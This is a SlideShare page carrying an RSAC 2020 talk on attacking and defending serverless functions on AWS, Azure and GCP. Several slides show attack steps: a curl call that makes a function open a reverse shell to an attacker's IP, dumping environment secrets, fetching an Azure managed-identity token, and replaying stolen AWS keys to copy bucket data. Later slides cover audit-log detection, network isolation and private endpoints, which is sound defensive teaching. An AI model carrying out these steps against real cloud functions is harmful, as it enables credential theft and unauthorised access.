Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
#RSAC
SESSION ID:
#RSAC
SESSION ID:
Eric Johnson
Defending Serverless Infrastructure
in the Cloud
CSV-T12
Principal Securi...
#RSAC
Cloud Serverless Infrastructure
2
Functions as a Service (FaaS) managed infrastructure offerings
across the Big 3 cl...
#RSAC
Goals For This Session
3
Reverse engineer the serverless execution environment
Discover insecurely stored function s...
#RSAC#RSAC
Function Execution Environment
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Execution Environment
5
Understanding the attacker's view of a serverless execution
environment helps prior...
#RSAC
Puma Security: Serverless Prey
6
Serverless Prey is an open source repository
containing:
Functions to establish a r...
#RSAC
Establishing The Function Reverse Shell
7
Function Invocation
Create the connection back to
the attacker's server:
R...
#RSAC
Serverless Execution Environment
8
Reverse engineering each function's execution environment:
Function OS Directory ...
#RSAC
Default Function Execution Networking
9
Configurable triggers
from HTTP or API
Gateway events
Routing allows Interne...
#RSAC#RSAC
Secrets Management
Defending Serverless Infrastructure in the Cloud
#RSAC
Hard-code in source code
Serverless Secrets Management Options
11
Options for managing secrets in cloud functions:
D...
#RSAC
Serverless Secrets: Where is the Source Code?
12
Start by looking for secrets in the function source code:
GCP Funct...
#RSAC
GCP Function: Source Code Example
13
Inspecting the GCP Function deployment package:
1
2
3
4
5
6
7
8
9
10
$ ls –la /...
#RSAC
GCP Function: Configuration File Example
14
Dumping the Go function's configuration data:
1
2
3
4
5
6
7
8
9
10
11
$ ...
#RSAC
Azure Function: Environment Variable Example
15
Environment variables can be accessed by remote attackers
using loca...
#RSAC
Serverless Secrets Management Options
16
Secrets can be stored in cloud-native secrets management services
and consu...
#RSAC
- Effect: Allow
Action: "ssm:GetParameter"
Resource: "arn:aws:ssm:us-east-1:1234567890
:parameter/panther/*"
Secrets...
#RSAC#RSAC
Function Execution Role
Defending Serverless Infrastructure in the Cloud
#RSAC
Serverless Execution Role
19
Functions gain access to other cloud resources (vault, secrets,
storage, database, etc....
#RSAC
GCP Function Default Service Account
20
GCP Functions
New functions inherit the Google managed "Editor" role by
defa...
#RSAC
Serverless Account Credential Storage
21
Managed serverless platforms executing under a service account
have credent...
#RSAC
$ curl -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT?
api-version=2017-09-01&
resource=https://storage.azure.com/"
Azure M...
#RSAC
{
"aud": "https://storage.azure.com/",
"exp": 1577161854,
"xms_mirid": "/subscriptions/12345/resourcegroups/
cougar/...
#RSAC#RSAC
Function Data Persistence & Exfiltration
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Credential Pivoting
25
Stolen function credentials can by replayed to gain access to cloud
resources under ...
#RSAC
$ aws s3 cp s3://panther-4dad894892ce
/assets/panther.jpg ~/Downloads/
AWS Credential Pivoting: Exfiltrating Secrets...
#RSAC
Serverless Function Credential Lifetime
27
Comparing the credential expiration time (number of minutes)
across the c...
#RSAC
Function Malware Persistence Example
28
Serverless containers are vulnerable to malware persistence:
All function co...
#RSAC
Serverless Function Persistence Lifetime
29
Comparing the malware persistence lifetime (number of minutes)
across th...
#RSAC#RSAC
Detecting Compromised Function Credentials
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Credential Audit Logging
31
Analyzing service audit logs can identify credential usage from
outside the fun...
#RSAC
Azure Monitor: Querying Diagnostics Example
32
Searching the diagnostics log for Azure Key Vault audit events:
1
2
3...
#RSAC
Azure Monitor: Compromised Credentials?
33
Function service identity invoking SecretGet from inside the
execution en...
#RSAC
Azure Monitor: Compromised Credentials?
34
Function service identity invoking SecretGet from outside the
execution e...
#RSAC#RSAC
Function Network Access Controls
Defending Serverless Infrastructure in the Cloud
#RSAC
Function Network Integration Options
36
Function execution environments can integrate with customer
managed virtual ...
#RSAC
Function Network Integration Benefits
37
Disconnect functions
from the outside world
Leverage security
groups for re...
#RSAC
Function Network Integration Example
38
Serverless framework configuration (serverless.yml) setting the
function exe...
#RSAC
Function Network Access Control
39
Enforcing strict function traffic flow rules can help prevent and
detect malware ...
#RSAC
Function Network Access Control Rules
40
Manage function
execution environment
egress traffic
Create rules for trust...
#RSAC
Function Traffic Flow: Security Group Example
41
Security Group configuration allowing egress traffic by port
443 an...
#RSAC
Function Network Flow Logs
42
Enabling network flow logs captures information about the
function's network traffic (...
#RSAC
Function Network Flow: VPC Logs Example
43
Capturing flow log data in the function's assigned VPC:
1
2
3
4
5
6
7
8
f...
#RSAC
CloudWatch Insights: Querying VPC Flow Logs Example
44
Searching the CloudWatch log for flow log reject traffic:
1
2...
#RSAC
Function Private Endpoints
45
Configuring private service endpoints creates a direct connection
between the function...
#RSAC
Function Private Endpoint Configuration
46
Create private endpoint
cloud resources
Configure function VPC
to route t...
#RSAC
Function Private Endpoint: S3 Example
47
Creating a private endpoint for function access to S3:
1
2
3
4
5
6
7
8
9
10...
#RSAC
Function Private Endpoint: S3 Bucket Policy
48
Bucket policy blocking external access to S3 resources:
1
2
3
4
5
6
7...
#RSAC
Function Private Endpoint: Blocking Public Access
49
Invoking the public S3 API with stolen credentials from an
atta...
#RSAC
Apply What Your Have Learned Today
50
Next week you should:
– Start a serverless function inventory across the cloud...
#RSAC
Acknowledgements
51
Gal Bashan (@galbashan1)
– https://github.com/epsagon/lambda-internals
Brandon Evans (@BrandonMa...
#RSAC
SESSION ID:
#RSAC
SESSION ID:
Eric Johnson
Defending Serverless Infrastructure
in the Cloud
CSV-T12
Principal Securi...
Upcoming SlideShare
Loading in …5
×

of

Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 1 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 2 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 3 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 4 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 5 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 6 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 7 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 8 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 9 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 10 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 11 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 12 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 13 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 14 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 15 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 16 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 17 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 18 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 19 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 20 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 21 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 22 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 23 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 24 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 25 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 26 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 27 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 28 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 29 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 30 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 31 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 32 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 33 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 34 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 35 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 36 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 37 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 38 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 39 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 40 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 41 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 42 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 43 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 44 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 45 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 46 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 47 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 48 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 49 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 50 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 51 Defending Serverless Infrastructure in the Cloud RSAC 2020 Slide 52
Upcoming SlideShare
What to Upload to SlideShare
Next
Download to read offline and view in fullscreen.

0 Likes

Share

Download to read offline

Defending Serverless Infrastructure in the Cloud RSAC 2020

Download to read offline

Cloud workloads running on Serverless Infrastructure provide near zero visibility to security teams. Can security professionals inventory, scan, and monitor an environment running thousands of functions for only 100 milliseconds? This technical session examines real world attacks and teaches you how to enable security controls to defend your Serverless Infrastructure.

Related Books

Free with a 30 day trial from Scribd

See all
  • Be the first to like this

Defending Serverless Infrastructure in the Cloud RSAC 2020

  1. 1. #RSAC SESSION ID: #RSAC SESSION ID: Eric Johnson Defending Serverless Infrastructure in the Cloud CSV-T12 Principal Security Engineer, Puma Security Principal Instructor, SANS Institute www.linkedin.com/in/eric-m-johnson @emjohn20
  2. 2. #RSAC Cloud Serverless Infrastructure 2 Functions as a Service (FaaS) managed infrastructure offerings across the Big 3 cloud providers: GCP FunctionsAzure FunctionsAWS Lambda
  3. 3. #RSAC Goals For This Session 3 Reverse engineer the serverless execution environment Discover insecurely stored function secrets Exfiltrate authentication tokens from the serverless container Detect stolen authentication tokens accessing cloud resources Apply network controls to prevent command and control Leverage audit logging and monitoring to detect malicious activity
  4. 4. #RSAC#RSAC Function Execution Environment Defending Serverless Infrastructure in the Cloud
  5. 5. #RSAC Function Execution Environment 5 Understanding the attacker's view of a serverless execution environment helps prioritize defenses: What user is executing the function? What operating system (OS) is running the function? What is the default directory? Where is the source code? What environment variables exist? Where are the service account creds / authentication tokens? What directories are writable?
  6. 6. #RSAC Puma Security: Serverless Prey 6 Serverless Prey is an open source repository containing: Functions to establish a reverse shell in each cloud – Cheetah: Google Function – Cougar: Azure Function – Panther: AWS Lambda Code and documentation to reproduce information presented in this session https://github.com/pumasecurity/serverless-prey
  7. 7. #RSAC Establishing The Function Reverse Shell 7 Function Invocation Create the connection back to the attacker's server: Reverse Shell Attacker's server waits for the incoming connections and issues commands: $ curl "https://us- central1-precise-works- 123456.cloudfunctions.net /cheetah?host=13.58.4.216 &port=1042"
  8. 8. #RSAC Serverless Execution Environment 8 Reverse engineering each function's execution environment: Function OS Directory User NodeJS 12 Amazon Linux 2 /var/task sbx_user1051 .NET Core 3.1 Debian GNU/Linux 9 / app Go 1.11 Ubuntu 18.04.2 LTS /srv/files root
  9. 9. #RSAC Default Function Execution Networking 9 Configurable triggers from HTTP or API Gateway events Routing allows Internet egress traffic and responses Routing allows egress traffic and responses to public cloud service APIs Function Private Subnet Public Subnet Internet Gateway Virtual Private Cloud Cloud Internet Storage Secrets
  10. 10. #RSAC#RSAC Secrets Management Defending Serverless Infrastructure in the Cloud
  11. 11. #RSAC Hard-code in source code Serverless Secrets Management Options 11 Options for managing secrets in cloud functions: Deploy a configuration file in the function's deployment package Pass secrets into the runtime as environment variables Read secrets from cloud key management service (KMS) or secrets manager
  12. 12. #RSAC Serverless Secrets: Where is the Source Code? 12 Start by looking for secrets in the function source code: GCP Functions Azure Functions AWS Lambda /var/task /home/site/wwwroot/ /srv/files
  13. 13. #RSAC GCP Function: Source Code Example 13 Inspecting the GCP Function deployment package: 1 2 3 4 5 6 7 8 9 10 $ ls –la /srv/files total 167 -rw-r--r-- 1 root root 268 Jan 3 16:49 Makefile -rw-r--r-- 1 root root 1898 Jan 3 16:49 cheetah.go -rw-r--r-- 1 root root 178 Jan 3 16:49 cheetah.yaml -rw-r--r-- 1 root root 170 Jan 3 16:49 go.mod -rw-r--r-- 1 root root 1798 Jan 3 16:49 go.sum -rw-r--r-- 1 root root 939 Jan 3 16:49 package.json -rw-r--r-- 1 root root 710 Jan 3 16:49 serverless.yml GCP Functions
  14. 14. #RSAC GCP Function: Configuration File Example 14 Dumping the Go function's configuration data: 1 2 3 4 5 6 7 8 9 10 11 $ cat /srv/files/cheetah.yaml # Server configurations server: host: "10.42.42.42" port: 8000 # Database credentials database: user: "cheetah_user" pass: "QnV0IHVuaWNvcm5zIGFwcGFyZW50bHkgZG8gZX hpc3Qu" GCP Functions
  15. 15. #RSAC Azure Function: Environment Variable Example 15 Environment variables can be accessed by remote attackers using local file inclusion or command injection vulnerabilities: 1 2 3 4 5 6 7 8 9 $ cat /proc/self/environ WEBSITE_AUTH_ENCRYPTION_KEY=BBDAD8269958635C8D4E3C713636D APPSETTING_AzureWebJobsStorage=6BZ4kOCoSD7T1fc8v4h8JpRg== APPSETTING_APPINSIGHTS_INSTRUMENTATIONKEY=5D17A234-6B81- 4777-8528-6814374E9BD3 MSI_SECRET=A788C6DE68224140A927BB412B4E24AB AzureWebEncryptionKey=BBDAD8046F6B9F0E81A4B349 CONTAINER_ENCRYPTION_KEY=AYXxtNMabRpw2EIgoGpibUk= Azure Functions
  16. 16. #RSAC Serverless Secrets Management Options 16 Secrets can be stored in cloud-native secrets management services and consumed by the function at runtime: GCP Functions Azure Functions AWS Lambda Secrets Manager / Parameter Store Azure Key Vault Secrets Manager
  17. 17. #RSAC - Effect: Allow Action: "ssm:GetParameter" Resource: "arn:aws:ssm:us-east-1:1234567890 :parameter/panther/*" Secrets Management: AWS Parameter Store Example 17 Parameter store provides encrypted secrets to the function at runtime: 1 2 3 4 $ aws ssm put-parameter --name /panther/database/pass --value "Panther" --type SecureString { "Version": 1, "Tier": "Standard" } AWS Lambda 1 2 3 4 Policy allowing the function to read the parameter value:
  18. 18. #RSAC#RSAC Function Execution Role Defending Serverless Infrastructure in the Cloud
  19. 19. #RSAC Serverless Execution Role 19 Functions gain access to other cloud resources (vault, secrets, storage, database, etc.) by executing with predefined permissions: GCP Functions Azure Functions AWS Lambda Execution Role Managed Identity Service Account
  20. 20. #RSAC GCP Function Default Service Account 20 GCP Functions New functions inherit the Google managed "Editor" role by default Editor role inherits read and modify state permissions for all existing project resources Function has full read and write access to storage buckets Payloads in the Secrets Manager require additional permissions
  21. 21. #RSAC Serverless Account Credential Storage 21 Managed serverless platforms executing under a service account have credentials stored in the following locations: GCP Functions Azure Functions AWS Lambda Environment Variables Managed Service Identity (MSI) Instance Metadata Service (IMDS)
  22. 22. #RSAC $ curl -H "Secret: $MSI_SECRET" "$MSI_ENDPOINT? api-version=2017-09-01& resource=https://storage.azure.com/" Azure Managed Service Identity Credentials 22 Extracting the MSI endpoint and authentication token from the function's environment: 1 2 3 4 $ cat /proc/self/environ | grep 'MSI' MSI_ENDPOINT=http://localhost:8081/msi/token MSI_SECRET=aEWPWND8qUk/U7RIkvY3IE8JetxQDZ9voUG Azure Functions 1 2 3 Requesting a JSON Web Token (JWT) from the MSI endpoint:
  23. 23. #RSAC { "aud": "https://storage.azure.com/", "exp": 1577161854, "xms_mirid": "/subscriptions/12345/resourcegroups/ cougar/…/pumapreycougar" } Azure Managed Service Identity Token 23 The MSI endpoint returns a JSON Web Token (JWT) that can be used to access the requested resource: 1 2 eyJ0…QSJ9.eyJh…TM3ZcHVtYXByZXktY291Z2FyL3Byb3ZpZGVycy9NaWN yb3NvZnQuV2ViL3NpdGVzL3B1bWFwcmV5Y291Z2FyIn0.k8En4SIf…K9ag Azure Functions 1 2 3 4 5 Decoding the token reveals the audience, expiration, subscription, etc.
  24. 24. #RSAC#RSAC Function Data Persistence & Exfiltration Defending Serverless Infrastructure in the Cloud
  25. 25. #RSAC Function Credential Pivoting 25 Stolen function credentials can by replayed to gain access to cloud resources under the function's identity: GCP Functions Azure Functions AWS Lambda AWS CLI Azure REST API GCloud REST API
  26. 26. #RSAC $ aws s3 cp s3://panther-4dad894892ce /assets/panther.jpg ~/Downloads/ AWS Credential Pivoting: Exfiltrating Secrets Example 26 Configuring the AWS CLI to authenticate as the function's execution role: 1 2 3 $ export AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q…4pg9g== $ export AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG $ export AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A 1 2 3 Exfiltrating an object from the function's S3 bucket: AWS Lambda
  27. 27. #RSAC Serverless Function Credential Lifetime 27 Comparing the credential expiration time (number of minutes) across the cloud providers: GCP Functions Azure Functions AWS Lambda 0 100 200 300 400 500 600 700 800
  28. 28. #RSAC Function Malware Persistence Example 28 Serverless containers are vulnerable to malware persistence: All function container file systems are read only by default 1 2 3 $ echo "X5O!P…C7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*" > backdoor.go /bin/sh: 8: cannot create backdoor.go: Read-only file system 1 2 3 $ echo "X5O!P…C7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*" > /tmp/malware.sh $ cat /tmp/malware.sh X5O!P…C7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* Except: all allow write access to the /tmp directory GCP Functions
  29. 29. #RSAC Serverless Function Persistence Lifetime 29 Comparing the malware persistence lifetime (number of minutes) across the cloud providers: GCP Functions Azure Functions AWS Lambda 0 2 4 6 8 10 12
  30. 30. #RSAC#RSAC Detecting Compromised Function Credentials Defending Serverless Infrastructure in the Cloud
  31. 31. #RSAC Function Credential Audit Logging 31 Analyzing service audit logs can identify credential usage from outside the function execution environment: Azure Functions AWS Lambda CloudTrail Azure Monitor (partial service support) IAM Audit Logs GCP Functions
  32. 32. #RSAC Azure Monitor: Querying Diagnostics Example 32 Searching the diagnostics log for Azure Key Vault audit events: 1 2 3 4 AzureDiagnostics | where ResourceProvider == "MICROSOFT.KEYVAULT" | where id_s contains "cougar-database-pass" | order by TimeGenerated desc Azure Functions
  33. 33. #RSAC Azure Monitor: Compromised Credentials? 33 Function service identity invoking SecretGet from inside the execution environment: 1 2 3 4 5 6 7 TimeGenerated: 1/20/2020, 1:34:52.309 AM identityClaim: …/providers/Microsoft.Web/sites/pumapreycougar id_s: https://…vault.azure.net/secrets/cougar-database-pass/… OperationName: SecretGet ResultType: Success CallerIPAddress: 20.189.179.189 clientinfo_s: azsdk-net-Security.KeyVault.Secrets/… Azure Functions
  34. 34. #RSAC Azure Monitor: Compromised Credentials? 34 Function service identity invoking SecretGet from outside the execution environment: 1 2 3 4 5 6 7 TimeGenerated: 1/20/2020, 1:34:52.309 AM identityClaim: …/providers/Microsoft.Web/sites/pumapreycougar id_s: https://…vault.azure.net/secrets/cougar-database-pass/… OperationName: SecretGet ResultType: Success CallerIPAddress: 95.025.143.109 clientinfo_s: curl/7.64.1 Azure Functions
  35. 35. #RSAC#RSAC Function Network Access Controls Defending Serverless Infrastructure in the Cloud
  36. 36. #RSAC Function Network Integration Options 36 Function execution environments can integrate with customer managed virtual private cloud networks: Azure Functions AWS Lambda Virtual Private Cloud (VPC) Virtual Network (VNet) Integration *Premium plan only Serverless Virtual Private Cloud (VPC) Access GCP Functions
  37. 37. #RSAC Function Network Integration Benefits 37 Disconnect functions from the outside world Leverage security groups for restricting traffic flow Capture function network flow logs Protect cloud resources with private cloud endpoints Function Private Subnet Public Subnet NAT Gateway Virtual Private Cloud Database (Optional) Private Cloud Endpoints Internet X X X Storage Secrets
  38. 38. #RSAC Function Network Integration Example 38 Serverless framework configuration (serverless.yml) setting the function execution environment's VPC and Security Group rules: 1 2 3 4 5 6 7 8 9 provider: name: aws runtime: nodejs12.x vpc: securityGroupIds: - !Ref securityGroup subnetIds: - !Ref privateSubnet1 - !Ref privateSubnet2 AWS Lambda
  39. 39. #RSAC Function Network Access Control 39 Enforcing strict function traffic flow rules can help prevent and detect malware and data exfiltration: Azure Functions AWS Lambda VPC Security Group Network Security Group (NSG) VPC Firewall Rules GCP Functions
  40. 40. #RSAC Function Network Access Control Rules 40 Manage function execution environment egress traffic Create rules for trusted services Filter traffic by IP CIDR block Filter traffic by port Function Private Subnet Public Subnet NAT Gateway Virtual Private Cloud Database (Optional) Private Cloud Endpoints Internet X Storage Secrets
  41. 41. #RSAC Function Traffic Flow: Security Group Example 41 Security Group configuration allowing egress traffic by port 443 and IP range: 1 2 3 4 5 6 7 8 10 11 12 securityGroup: Type: "AWS::EC2::SecurityGroup" Properties: VpcId: !Ref lambdaVpc GroupDescription: "Security group for panther." SecurityGroupEgress: - CidrIp: "10.42.0.0/16" IpProtocol: "TCP" FromPort: 443 ToPort: 443 Description: "Outbound 443 to our friends." AWS Lambda
  42. 42. #RSAC Function Network Flow Logs 42 Enabling network flow logs captures information about the function's network traffic (src, dst, port, IP, etc.): Azure Functions AWS Lambda VPC Flow Logs NSG Flow Logs VPC Flow Logs GCP Functions
  43. 43. #RSAC Function Network Flow: VPC Logs Example 43 Capturing flow log data in the function's assigned VPC: 1 2 3 4 5 6 7 8 flowLog: Type: AWS::EC2::FlowLog Properties: DeliverLogsPermissionArn: !GetAtt flowLogRole.Arn LogGroupName: !Sub "/aws/lambda/vpc/panther/flowlog" ResourceId: !Ref lambdaVpc ResourceType: "VPC" TrafficType: "REJECT" AWS Lambda
  44. 44. #RSAC CloudWatch Insights: Querying VPC Flow Logs Example 44 Searching the CloudWatch log for flow log reject traffic: 1 2 3 4 fields @timestamp, @message | filter dstPort = 1042 | sort @timestamp desc | limit 20 AWS Lambda
  45. 45. #RSAC Function Private Endpoints 45 Configuring private service endpoints creates a direct connection between the function and cloud resources (no external traffic): Azure Functions AWS Lambda Virtual Private Cloud (VPC) Endpoints Azure Private Endpoint Private Services Access GCP Functions
  46. 46. #RSAC Function Private Endpoint Configuration 46 Create private endpoint cloud resources Configure function VPC to route to private endpoint Block access to cloud resource from the public API Function Private Subnet Public Subnet NAT Gateway Virtual Private Cloud Database (Optional) Private Cloud Endpoints Internet Storage Secrets
  47. 47. #RSAC Function Private Endpoint: S3 Example 47 Creating a private endpoint for function access to S3: 1 2 3 4 5 6 7 8 9 10 s3Endpoint: Type: AWS::EC2::VPCEndpoint Properties: PolicyDocument: | { "Statement": [{ "Effect": "Allow" , "Principal": "*", "Action": [ "s3:*" ] }] } RouteTableIds: - !Ref privateRouteTable ServiceName: "com.amazonaws.us-east-1.s3" VpcId: !Ref lambdaVpc AWS Lambda
  48. 48. #RSAC Function Private Endpoint: S3 Bucket Policy 48 Bucket policy blocking external access to S3 resources: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 bucketPolicy: Type: "AWS::S3::BucketPolicy" Properties: Bucket: !Ref bucket PolicyDocument: | { "Statement": [{ "Effect": "Deny", "Principal": { "AWS": [ Fn::GetAtt [ "LambdaExecutionRole", "Arn" ] ] }, "Action": [ "s3:*" ] }], "Resource": [ Fn:GetAtt[ "bucket", "Arn" ] ], "Condition": { "StringNotEquals": { "aws:sourceVpce": { "Ref": "lambdaVpc" } } } } ] } AWS Lambda
  49. 49. #RSAC Function Private Endpoint: Blocking Public Access 49 Invoking the public S3 API with stolen credentials from an attacker's machine: 1 2 3 4 $ aws s3api list-objects --bucket panther-4dad894 An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied AWS Lambda CloudTrail query searching for S3 access denied events:
  50. 50. #RSAC Apply What Your Have Learned Today 50 Next week you should: – Start a serverless function inventory across the cloud providers – Scan function repositories for vulnerabilities and poor secrets management Within 3 months, you should: – Centralize function and network audit logs – Develop a monitoring and alerting strategy for function logs Within 6 months, you should: – Leverage functions to automatically detect compromised function credentials
  51. 51. #RSAC Acknowledgements 51 Gal Bashan (@galbashan1) – https://github.com/epsagon/lambda-internals Brandon Evans (@BrandonMaxEvans) – Senior Application Security Engineer, Asurion OWASP Serverless Top 10 Project – https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project – Major contributions from Puresec and Protego
  52. 52. #RSAC SESSION ID: #RSAC SESSION ID: Eric Johnson Defending Serverless Infrastructure in the Cloud CSV-T12 Principal Security Engineer, Puma Security Principal Instructor, SANS Institute www.linkedin.com/in/eric-m-johnson @emjohn20

Cloud workloads running on Serverless Infrastructure provide near zero visibility to security teams. Can security professionals inventory, scan, and monitor an environment running thousands of functions for only 100 milliseconds? This technical session examines real world attacks and teaches you how to enable security controls to defend your Serverless Infrastructure.

Views

Total views

263

On Slideshare

0

From embeds

0

Number of embeds

5

Actions

Downloads

13

Shares

0

Comments

0

Likes

0

×